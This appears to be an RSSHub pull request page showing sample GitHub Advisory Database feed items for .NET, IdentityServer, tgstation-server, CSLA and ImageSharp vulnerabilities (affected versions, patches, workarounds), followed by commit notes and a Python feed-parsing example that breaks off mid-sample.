<h3><a name="user-content-how-fix"></a>How do I fix the issue?</h3>
<ul>
<li>To fix the issue please install the latest version of .NET 8.0 or .NET 6.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.</li>
<li>If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the <code class="notranslate">dotnet --info</code> command. You will see output like the following:</li>
</ul>
<pre class="notranslate"><code class="notranslate">.NET Core SDK (reflecting any global.json):
Version: 8.0.200
Commit: 8473146e7d
Runtime Environment:
OS Name: Windows
OS Version: 10.0.18363
OS Platform: Windows
RID: win10-x64
Base Path: C:\Program Files\dotnet\sdk\6.0.300\
Host (useful for support):
Version: 8.0.3
Commit: 8473146e7d
.NET Core SDKs installed:
8.0.200 [C:\Program Files\dotnet\sdk]
.NET Core runtimes installed:
Microsoft.AspAspNetCore.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.AspAspNetCore.App]
Microsoft.AspNetCore.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
Microsoft.WindowsDesktop.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
To install additional .NET Core runtimes or SDKs:
https://aka.ms/dotnet-download
</code></pre>
<ul>
<li>If you're using .NET 8.0, you should download and install .NET 8.0.8 Runtime or .NET 8.0.108 SDK (for Visual Studio 2022 v17.8) from <a href="https://dotnet.microsoft.com/download/dotnet-core/8.0" rel="nofollow">https://dotnet.microsoft.com/download/dotnet-core/8.0</a>.</li>
</ul>
<p>.NET 8.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update &amp; Security and then click Check for Updates.</p>
<p>Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.</p>
<p>Additionally, if you've deployed <a href="https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd" rel="nofollow">self-contained applications</a> targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.</p>
<h2>Other Information</h2>
<h3>Reporting Security Issues</h3>
<p>If you have found a potential security issue in .NET 8.0 or .NET 6.0, please email details to <a href="mailto:secure@microsoft.com">secure@microsoft.com</a>. Reports may qualify for the Microsoft .NET Core &amp; .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at <a href="https://aka.ms/corebounty" rel="nofollow">https://aka.ms/corebounty</a>.</p>
<h3>Support</h3>
<p>You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at <a href="https://github.com/dotnet/runtime">https://github.com/dotnet/runtime</a> and <a href="https://github.com/dotnet/aspnet/">https://github.com/dotnet/aspnet/</a>. The Announcements repo (<a href="https://github.com/dotnet/Announcements">https://github.com/dotnet/Announcements</a>) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.</p>
<h3>Disclaimer</h3>
<p>The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.</p>
<h3>External Links</h3>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-38168" rel="nofollow">CVE-2024-38168</a></p>
<h3>Revisions</h3>
<p>V1.0 (August 13, 2024): Advisory published.</p>
<p><em>Version 1.0</em></p>
<p><em>Last Updated 2024-08-13</em></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-7qrv-8f9x-3h32" href="https://github.com/dotnet/aspnetcore/security/advisories/GHSA-7qrv-8f9x-3h32">GHSA-7qrv-8f9x-3h32</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-38168" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-38168</a></li>
<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38168" rel="nofollow">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38168</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7qrv-8f9x-3h32</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7qrv-8f9x-3h32</guid>
<pubDate>Tue, 13 Aug 2024 19:27:23 GMT</pubDate>
</item>
<item>
<title>Microsoft Security Advisory CVE-2024-38167 | .NET Information Disclosure Vulnerability</title>
<description><h1>Microsoft Security Advisory <a title="CVE-2024-38167" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-3r34-r6w3-fqp6/hovercard" href="https://github.com/advisories/GHSA-3r34-r6w3-fqp6">CVE-2024-38167</a> | .NET Information Disclosure Vulnerability</h1>
<h2><a name="user-content-executive-summary"></a>Executive summary</h2>
<p>Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.</p>
<p>A vulnerability exists in .NET runtime TlsStream which may result in Information Disclosure.</p>
<h2>Discussion</h2>
<p>Discussion for this issue can be found at <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2463942900" data-permission-text="Title is private" data-url="https://github.com/dotnet/runtime/issues/106359" data-hovercard-type="issue" data-hovercard-url="/dotnet/runtime/issues/106359/hovercard" href="https://github.com/dotnet/runtime/issues/106359">dotnet/runtime#106359</a></p>
<h2><a name="user-content-mitigation-factors"></a>Mitigation factors</h2>
<p>Microsoft has not identified any mitigating factors for this vulnerability.</p>
<h2><a name="user-content-affected-software"></a>Affected software</h2>
<ul>
<li>Any .NET 8.0 application running on .NET 8.0.7 or earlier.</li>
</ul>
<h2><a name="user-content-affected-packages"></a>Affected Packages</h2>
<p>The vulnerability affects any Microsoft .NET Core project if it uses any of the affected package versions listed below.</p>
<h3><a name="user-content-.net 8"></a>.NET 8</h3>
<markdown-accessiblity-table><table role="table">
<thead>
<tr>
<th>Package name</th>
<th>Affected version</th>
<th>Patched version</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm" rel="nofollow">Microsoft.NetCore.App.Runtime.linux-arm</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm64" rel="nofollow">Microsoft.NetCore.App.Runtime.linux-arm64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm" rel="nofollow">Microsoft.NetCore.App.Runtime.linux-musl-arm</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm64" rel="nofollow">Microsoft.NetCore.App.Runtime.linux-musl-arm64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-x64" rel="nofollow">Microsoft.NetCore.App.Runtime.linux-musl-x64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-x64" rel="nofollow">Microsoft.NetCore.App.Runtime.linux-x64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-arm64" rel="nofollow">Microsoft.NetCore.App.Runtime.osx-arm64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-x64" rel="nofollow">Microsoft.NetCore.App.Runtime.osx-x64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm" rel="nofollow">Microsoft.NetCore.App.Runtime.win-arm</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64" rel="nofollow">Microsoft.NetCore.App.Runtime.win-arm64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64" rel="nofollow">Microsoft.NetCore.App.Runtime.win-x64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86" rel="nofollow">Microsoft.NetCore.App.Runtime.win-x86</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
</tbody>
</table></markdown-accessiblity-table>
<h2>Advisory FAQ</h2>
<h3><a name="user-content-how-affected"></a>How do I know if I am affected?</h3>
<p>If you have a runtime or SDK with a version listed, or an affected package listed in <a href="https://github.com/advisories/GHSA-3r34-r6w3-fqp6#affected-packages">affected software</a> or <a href="https://github.com/advisories/GHSA-3r34-r6w3-fqp6#affected-software">affected packages</a>, you're exposed to the vulnerability.</p>
<h3><a name="user-content-how-fix"></a>How do I fix the issue?</h3>
<ul>
<li>To fix the issue please install the latest version of .NET 8.0 or .NET 6.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.</li>
<li>If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the <code class="notranslate">dotnet --info</code> command. You will see output like the following:</li>
</ul>
<pre class="notranslate"><code class="notranslate">.NET Core SDK (reflecting any global.json):
Version: 8.0.200
Commit: 8473146e7d
Runtime Environment:
OS Name: Windows
OS Version: 10.0.18363
OS Platform: Windows
RID: win10-x64
Base Path: C:\Program Files\dotnet\sdk\6.0.300\
Host (useful for support):
Version: 8.0.3
Commit: 8473146e7d
.NET Core SDKs installed:
8.0.200 [C:\Program Files\dotnet\sdk]
.NET Core runtimes installed:
Microsoft.AspAspNetCore.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.AspAspNetCore.App]
Microsoft.AspNetCore.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
Microsoft.WindowsDesktop.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
To install additional .NET Core runtimes or SDKs:
https://aka.ms/dotnet-download
</code></pre>
<ul>
<li>If you're using .NET 8.0, you should download and install .NET 8.0.8 Runtime or .NET 8.0.108 SDK (for Visual Studio 2022 v17.8) from <a href="https://dotnet.microsoft.com/download/dotnet-core/8.0" rel="nofollow">https://dotnet.microsoft.com/download/dotnet-core/8.0</a>.</li>
</ul>
<p>.NET 8.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update &amp; Security and then click Check for Updates.</p>
<p>Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.</p>
<p>Additionally, if you've deployed <a href="https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd" rel="nofollow">self-contained applications</a> targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.</p>
<h2>Other Information</h2>
<h3>Reporting Security Issues</h3>
<p>If you have found a potential security issue in .NET 8.0 or .NET 6.0, please email details to <a href="mailto:secure@microsoft.com">secure@microsoft.com</a>. Reports may qualify for the Microsoft .NET Core &amp; .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at <a href="https://aka.ms/corebounty" rel="nofollow">https://aka.ms/corebounty</a>.</p>
<h3>Support</h3>
<p>You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at <a href="https://github.com/dotnet/runtime">https://github.com/dotnet/runtime</a> and <a href="https://github.com/dotnet/aspnet/">https://github.com/dotnet/aspnet/</a>. The Announcements repo (<a href="https://github.com/dotnet/Announcements">https://github.com/dotnet/Announcements</a>) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.</p>
<h3>Disclaimer</h3>
<p>The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.</p>
<h3>External Links</h3>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-38167" rel="nofollow">CVE-2024-38167</a></p>
<h3>Revisions</h3>
<p>V1.0 (August 13, 2024): Advisory published.</p>
<p><em>Version 1.0</em></p>
<p><em>Last Updated 2024-08-13</em></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-3r34-r6w3-fqp6" href="https://github.com/dotnet/runtime/security/advisories/GHSA-3r34-r6w3-fqp6">GHSA-3r34-r6w3-fqp6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-38167" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-38167</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2463942900" data-permission-text="Title is private" data-url="https://github.com/dotnet/runtime/issues/106359" data-hovercard-type="issue" data-hovercard-url="/dotnet/runtime/issues/106359/hovercard" href="https://github.com/dotnet/runtime/issues/106359">dotnet/runtime#106359</a></li>
<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38167" rel="nofollow">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38167</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-3r34-r6w3-fqp6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-3r34-r6w3-fqp6</guid>
<pubDate>Tue, 13 Aug 2024 19:26:10 GMT</pubDate>
</item>
<item>
<title>IdentityServer Open Redirect vulnerability</title>
<description><h3>Impact</h3>
<p>It is possible for an attacker to craft malicious Urls that certain functions in IdentityServer will incorrectly treat as local and trusted. If such a Url is returned as a redirect, some browsers will follow it to a third-party, untrusted site.</p>
<h3>Affected Methods</h3>
<ul>
<li>
<p>In the <code class="notranslate">DefaultIdentityServerInteractionService</code>, the <code class="notranslate">GetAuthorizationContextAsync</code> method may return non-null and the <code class="notranslate">IsValidReturnUrl</code> method may return true for malicious Urls, indicating incorrectly that they can be safely redirected to.</p>
<p><em>UI code calling these two methods is the most commonly used code path that will expose the vulnerability. The default UI templates rely on this behavior in the Login, Challenge, and Consent pages. Customized user interface code might also rely on this behavior. The following uncommonly used APIs are also vulnerable:</em></p>
</li>
<li>
<p>The <code class="notranslate">ServerUrlExtensions.GetIdentityServerRelativeUrl</code>, <code class="notranslate">ReturnUrlParser.ParseAsync</code> and <code class="notranslate">OidcReturnUrlParser.ParseAsync</code> methods may incorrectly return non-null, and the <code class="notranslate">ReturnUrlParser.IsValidReturnUrl</code> and <code class="notranslate">OidcReturnUrlParser.IsValidReturnUrl</code> methods may incorrectly return true for malicious Urls.</p>
</li>
</ul>
<h3>Patches</h3>
<p>IdentityServer4 is no longer supported and will not be receiving updates. Please consider updating to <a href="https://duendesoftware.com/" rel="nofollow">Duende.IdentityServer</a>.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-ff4q-64jc-gx98" href="https://github.com/DuendeSoftware/IdentityServer/security/advisories/GHSA-ff4q-64jc-gx98">GHSA-ff4q-64jc-gx98</a></li>
<li><a title="GHSA-55p7-v223-x366" href="https://github.com/IdentityServer/IdentityServer4/security/advisories/GHSA-55p7-v223-x366">GHSA-55p7-v223-x366</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-39694" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-39694</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-55p7-v223-x366</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-55p7-v223-x366</guid>
<pubDate>Wed, 31 Jul 2024 19:57:33 GMT</pubDate>
</item>
<item>
<title>IdentityServer Open Redirect vulnerability</title>
<description><h3>Impact</h3>
<p>It is possible for an attacker to craft malicious Urls that certain functions in IdentityServer will incorrectly treat as local and trusted. If such a Url is returned as a redirect, some browsers will follow it to a third-party, untrusted site.</p>
<p><em>Note: by itself, this vulnerability does <strong>not</strong> allow an attacker to obtain user credentials, authorization codes, access tokens, refresh tokens, or identity tokens. An attacker could however exploit this vulnerability as part of a phishing attack designed to steal user credentials.</em></p>
<h3>Affected Methods</h3>
<ul>
<li>
<p>In the <code class="notranslate">DefaultIdentityServerInteractionService</code>, the <code class="notranslate">GetAuthorizationContextAsync</code> method may return non-null and the <code class="notranslate">IsValidReturnUrl</code> method may return true for malicious Urls, indicating incorrectly that they can be safely redirected to.</p>
<p><em>UI code calling these two methods is the most commonly used code path that will expose the vulnerability. The default UI templates rely on this behavior in the Login, Challenge, Consent, and Account Creation pages. Customized user interface code might also rely on this behavior. The following uncommonly used APIs are also vulnerable:</em></p>
</li>
<li>
<p>The <code class="notranslate">ServerUrlExtensions.GetIdentityServerRelativeUrl</code>, <code class="notranslate">ReturnUrlParser.ParseAsync</code> and <code class="notranslate">OidcReturnUrlParser.ParseAsync</code> methods may incorrectly return non-null, and the <code class="notranslate">ReturnUrlParser.IsValidReturnUrl</code> and <code class="notranslate">OidcReturnUrlParser.IsValidReturnUrl</code> methods may incorrectly return true for malicious Urls.</p>
</li>
</ul>
<h3>Patches</h3>
<p>This vulnerability is fixed in the following versions of Duende.IdentityServer:</p>
<ul>
<li>7.0.6</li>
<li>6.3.10</li>
<li>6.2.5</li>
<li>6.1.8</li>
<li>6.0.5</li>
</ul>
<p>Duende.IdentityServer 5.1 and earlier and all versions of IdentityServer4 are no longer supported and will not be receiving updates.</p>
<h3>Workarounds</h3>
<p>If upgrading is not possible, use <code class="notranslate">IUrlHelper.IsLocalUrl</code> from ASP.NET Core 5.0 or later to validate return Urls in user interface code in the IdentityServer host.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-ff4q-64jc-gx98" href="https://github.com/DuendeSoftware/IdentityServer/security/advisories/GHSA-ff4q-64jc-gx98">GHSA-ff4q-64jc-gx98</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/DuendeSoftware/IdentityServer/commit/269ca2171fe1e901c87f2f0797bbc7c230db87c6/hovercard" href="https://github.com/DuendeSoftware/IdentityServer/commit/269ca2171fe1e901c87f2f0797bbc7c230db87c6">DuendeSoftware/IdentityServer@<tt>269ca21</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/DuendeSoftware/IdentityServer/commit/765116a2d4fb0671b6eba015e698533900c61c8e/hovercard" href="https://github.com/DuendeSoftware/IdentityServer/commit/765116a2d4fb0671b6eba015e698533900c61c8e">DuendeSoftware/IdentityServer@<tt>765116a</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/DuendeSoftware/IdentityServer/commit/d0d8eab35ad9183b14925496803ed8b36658d0a1/hovercard" href="https://github.com/DuendeSoftware/IdentityServer/commit/d0d8eab35ad9183b14925496803ed8b36658d0a1">DuendeSoftware/IdentityServer@<tt>d0d8eab</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/DuendeSoftware/IdentityServer/commit/f04cf0be859b93f43563f8f812eb92206ad94011/hovercard" href="https://github.com/DuendeSoftware/IdentityServer/commit/f04cf0be859b93f43563f8f812eb92206ad94011">DuendeSoftware/IdentityServer@<tt>f04cf0b</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/DuendeSoftware/IdentityServer/commit/fe817b499933d6ed6141b153492d7335c28b184a/hovercard" href="https://github.com/DuendeSoftware/IdentityServer/commit/fe817b499933d6ed6141b153492d7335c28b184a">DuendeSoftware/IdentityServer@<tt>fe817b4</tt></a></li>
<li><a title="GHSA-55p7-v223-x366" href="https://github.com/IdentityServer/IdentityServer4/security/advisories/GHSA-55p7-v223-x366">GHSA-55p7-v223-x366</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-39694" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-39694</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ff4q-64jc-gx98</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ff4q-64jc-gx98</guid>
<pubDate>Wed, 31 Jul 2024 15:28:54 GMT</pubDate>
</item>
<item>
<title>tgstation-server's DreamMaker environment files outside the deployment directory can be compiled and run by insufficiently permissioned users</title>
<description><h3>Impact</h3>
<p><em>What kind of vulnerability is it? Who is impacted?</em></p>
<p>Low permission users using the "Set .dme Path" privilege could potentially set malicious .dme files existing on the host machine to be compiled and executed.</p>
<p>These .dme files could be uploaded via tgstation-server (requiring a separate, isolated privilege) or some other means.</p>
<p>A server configured to execute in BYOND's trusted security level (requiring a third separate, isolated privilege OR being set by another user) could lead to this escalating into remote code execution via BYOND's shell() proc.</p>
<p>The ability to execute this kind of attack is a known side effect of having privileged TGS users, but normally requires multiple privileges with known weaknesses. This vector is not intentional as it does not require control over where deployment code is sourced from and <em>may</em> not require remote write access to an instance's <code class="notranslate">Configuration</code> directory.</p>
<h3>Patches</h3>
<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>
<p>This problem is patched by pull request #1835 and fixed in versions 6.8.0 and above.</p>
<h3>Workarounds</h3>
<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>
<p>Do not give un-trusted users the Deployment permission to set a .dme path on instances.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-c3h4-9gc2-f7h4" href="https://github.com/tgstation/tgstation-server/security/advisories/GHSA-c3h4-9gc2-f7h4">GHSA-c3h4-9gc2-f7h4</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-41799" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-41799</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2428714940" data-permission-text="Title is private" data-url="https://github.com/tgstation/tgstation-server/issues/1835" data-hovercard-type="pull_request" data-hovercard-url="/tgstation/tgstation-server/pull/1835/hovercard" href="https://github.com/tgstation/tgstation-server/pull/1835">tgstation/tgstation-server#1835</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/tgstation/tgstation-server/commit/374852fe5ae306415eb5aafb2d16b06897d7afe4/hovercard" href="https://github.com/tgstation/tgstation-server/commit/374852fe5ae306415eb5aafb2d16b06897d7afe4">tgstation/tgstation-server@<tt>374852f</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-c3h4-9gc2-f7h4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-c3h4-9gc2-f7h4</guid>
<pubDate>Mon, 29 Jul 2024 16:44:15 GMT</pubDate>
</item>
<item>
<title>CSLA Directory Traversal vulnerability</title>
<description><p>Directory Traversal vulnerability in Marimer LLC CSLA .Net before 8.0 allows a remote attacker to execute arbitrary code via a crafted script to the MobileFormatter component.</p>
<p>Fixes for this issue have been backported to the 5.x, 6.x, and 7.x branches of CSLA. CSLA version 5.5.4 contains a fix. As of time of publication, 6.x and 7.x do not have numbered versions containing the fix but do have fix commits available.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-28698" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-28698</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1988343400" data-permission-text="Title is private" data-url="https://github.com/MarimerLLC/csla/issues/3552" data-hovercard-type="pull_request" data-hovercard-url="/MarimerLLC/csla/pull/3552/hovercard" href="https://github.com/MarimerLLC/csla/pull/3552">MarimerLLC/csla#3552</a></li>
<li><a href="https://www.intruder.io/research/path-traversal-and-code-execution-in-csla-net-cve-2024-28698" rel="nofollow">https://www.intruder.io/research/path-traversal-and-code-execution-in-csla-net-cve-2024-28698</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/MarimerLLC/csla/commit/2c32a5748a0a4bb0159285dfad61d4050e890080/hovercard" href="https://github.com/MarimerLLC/csla/commit/2c32a5748a0a4bb0159285dfad61d4050e890080">MarimerLLC/csla@<tt>2c32a57</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/MarimerLLC/csla/commit/445bc609bc117f62cabf49e1462f7a43b0f8f9a2/hovercard" href="https://github.com/MarimerLLC/csla/commit/445bc609bc117f62cabf49e1462f7a43b0f8f9a2">MarimerLLC/csla@<tt>445bc60</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/MarimerLLC/csla/commit/8fbdd8c773bfeb9ba3e52d91b5a664848629b13a/hovercard" href="https://github.com/MarimerLLC/csla/commit/8fbdd8c773bfeb9ba3e52d91b5a664848629b13a">MarimerLLC/csla@<tt>8fbdd8c</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/MarimerLLC/csla/commit/f3a5c3474974f60ce3c8ffbd5d91c23a1e397ea4/hovercard" href="https://github.com/MarimerLLC/csla/commit/f3a5c3474974f60ce3c8ffbd5d91c23a1e397ea4">MarimerLLC/csla@<tt>f3a5c34</tt></a></li>
<li><a href="https://github.com/MarimerLLC/csla/releases/tag/v5.5.4">https://github.com/MarimerLLC/csla/releases/tag/v5.5.4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9xhh-3m78-gvgj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9xhh-3m78-gvgj</guid>
<pubDate>Mon, 22 Jul 2024 18:31:48 GMT</pubDate>
</item>
<item>
<title>SixLabors ImageSharp has Excessive Memory Allocation in Gif Decoder</title>
<description><h3>Impact</h3>
<p><em>What kind of vulnerability is it? Who is impacted?</em></p>
<p>A vulnerability was discovered in the ImageSharp library: the processing of specially crafted files can lead to excessive memory usage in the Gif decoder. The vulnerability is triggered when ImageSharp attempts to process image files that are designed to exploit this flaw.</p>
<h3>Patches</h3>
<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>
<p>The problem has been patched. All users are advised to upgrade to v3.1.5 or v2.1.9.</p>
<h3>Workarounds</h3>
<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>
<p>Before calling <code class="notranslate">Image.Decode(Async)</code>, use <code class="notranslate">Image.Identify</code> to determine the image dimensions in order to enforce a limit.</p>
<h3>References</h3>
<p><em>Are there any links users can visit to find out more?</em></p>
<ul>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2377236095" data-permission-text="Title is private" data-url="https://github.com/SixLabors/ImageSharp/issues/2759" data-hovercard-type="pull_request" data-hovercard-url="/SixLabors/ImageSharp/pull/2759/hovercard" href="https://github.com/SixLabors/ImageSharp/pull/2759">Six ... |
* feat(github-advisor): add GitHub Advisory Database RSS route and namespace
* fix(xiaohongshu): handle optional chaining for cover image URL
* refactor(github-advisor): remove unused code and files
* feat(github): add GitHub Advisory Database RSS route
* refactor(route): fix category in GitHub Advisor route
* refactor(route): update the category parameter name in the GitHub Advisor route
* refactor(route): Updated to scrape HTML directly instead of relying on third-party API
Involved Issue
None
Example for the Proposed Route(s)
New RSS Route Checklist
Puppeteer
Note
Add an RSSHub subscription for github.com/advisories.
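Consuming the route's output from a script, as an added example that is not part of this PR or of RSSHub: it parses the RSS with the Python standard library, pulls the GHSA ID, CVE IDs and fix commits out of each item, and flattens the third-party HTML carried in each `<description>` to plain text instead of rendering it. The two items in `SAMPLE_FEED` are constructed from the tgstation-server and CSLA entries shown above, with the description entity-escaped as it is on the wire (the page shows it already decoded); the record layout, the regexes and the `published_after` watermark helper are this example's own choices, not anything the route defines.

```python
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from html import unescape

# Constructed sample in the shape the route emits: two items built from the
# advisories shown above, description entity-escaped as a real feed has it.
SAMPLE_FEED = """<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - nuget</title>
<link>https://github.com/advisories</link>
<item>
<title>tgstation-server's DreamMaker environment files outside the deployment directory can be compiled and run by insufficiently permissioned users</title>
<description>&lt;h3&gt;Impact&lt;/h3&gt;&lt;p&gt;Low permission users using the "Set .dme Path" privilege could potentially set malicious .dme files existing on the host machine to be compiled and executed.&lt;/p&gt;&lt;h3&gt;References&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2024-41799"&gt;https://nvd.nist.gov/vuln/detail/CVE-2024-41799&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a class="commit-link" data-hovercard-url="https://github.com/tgstation/tgstation-server/commit/374852fe5ae306415eb5aafb2d16b06897d7afe4/hovercard" href="https://github.com/tgstation/tgstation-server/commit/374852fe5ae306415eb5aafb2d16b06897d7afe4"&gt;tgstation/tgstation-server@&lt;tt&gt;374852f&lt;/tt&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;</description>
<link>https://github.com/advisories/GHSA-c3h4-9gc2-f7h4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-c3h4-9gc2-f7h4</guid>
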